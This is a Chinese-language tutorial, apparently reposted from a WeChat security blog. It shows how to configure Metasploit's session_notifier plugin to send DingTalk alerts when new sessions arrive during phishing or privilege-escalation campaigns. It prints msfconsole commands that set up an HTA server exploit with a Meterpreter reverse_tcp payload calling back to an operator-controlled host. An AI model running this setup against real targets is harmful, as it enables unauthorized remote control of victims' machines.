Skip to content

Latest commit

 

History

History
104 lines (65 loc) · 7.68 KB

Metasploit 主机上线钉钉通知.md

File metadata and controls

104 lines (65 loc) · 7.68 KB

> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/TpC-93r7dA7luEhkiHAi\_g) |

**声明:**该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

所有话题标签:

#Web 安全   #漏洞复现   #工具使用   #权限提升

#权限维持   #防护绕过   #内网安全   #实战案例

#其他笔记   #资源分享 #MSF

|

0x01 前言

我们在进行钓鱼攻击或被动提权时可能需要在 MSF 长期监听某个端口,等待管理员执行上线,但又不可能随时都盯着监听界面,这样就不能及时得知是否有新主机上线,是不是很不方便呢?

最近在 metasploit-framework 项目中看到安恒 @三米前有蕉皮老哥提交的 “钉钉通知” 拉取请求,现已被 rapid7 合并到了 session_notifier 会话通知插件中。

0x01 钉钉机器人 webhook 配置

我们先在钉钉官网下载 Windows 客户端并注册一个用户进行登录,然后发起一个群组并在群设置中的智能群助手里添加一个自定义机器人。

机器人的名称可以随便取,在安全设置中添加一个自定义关键字 “session”,这是一个不能修改的固定值。

0x02 session_notifier 插件配置

msfconole 命令进入 MSF 后先用 load 加载 session_notifier 插件,将 set_session_dingtalk_webhook 设置为我们钉钉机器人中的 Webhook,然后用 start_session_notifier 命令开启会话通知即可。

root@:kali~# msfconsole -q
msf6 > load session\_notifier
msf6 > set\_session\_dingtalk\_webhook https://oapi.dingtalk.com/robot/send?access\_token=
msf6 > start\_session\_notifier

SessionNotifier Commands:

restart\_session\_notifier        //重新启动会话通知
save\_session\_notifier\_settings  //将所有会话通知设置保存到框架
set\_session\_dingtalk\_webhook    //设置DingTalk会话通知(关键字: session)
set\_session\_maximum\_ip          //设置会话通知最大IP范围
set\_session\_minimum\_ip          //设置会话通知最小IP范围
set\_session\_mobile\_carrier      //设置手机的移动运营商
set\_session\_mobile\_number       //设置您要通知的10位手机号码
set\_session\_smtp\_address        //设置会话通知SMTP地址
set\_session\_smtp\_from           //设置SMTP发件人
set\_session\_smtp\_password       //设置SMTP密码
set\_session\_smtp\_port           //设置会话通知SMTP端口
set\_session\_smtp\_username       //设置SMTP用户名
start\_session\_notifier          //开始会话通知
stop\_session\_notifier           //停止会话通知

随便设置了一个 hta_server 监听模块来测试一下看是否能够实时收到新上线主机的通知。

msf6 > use exploit/windows/misc/hta\_server 
msf6 exploit(windows/misc/hta\_server) > set target 1
msf6 exploit(windows/misc/hta\_server) > set payload windows/x64/meterpreter/reverse\_tcp
msf6 exploit(windows/misc/hta\_server) > set lhost 39.\*\*.\*.238
msf6 exploit(windows/misc/hta\_server) > set lport 443
msf6 exploit(windows/misc/hta\_server) > exploit

这里我们可以看到钉钉群组里已经成功的收到了机器人发送过来的新上线主机通知信息!!!

【往期 TOP5】

绕过 CDN 查找真实 IP 方法总结

站库分离常规渗透思路总结

谷歌浏览器插件 - 渗透测试篇

谷歌浏览器插件推荐 - 日常使用篇

绕过 360 安全卫士提权实战案例

  如果对你有所帮助,点个分享、赞、在看呗!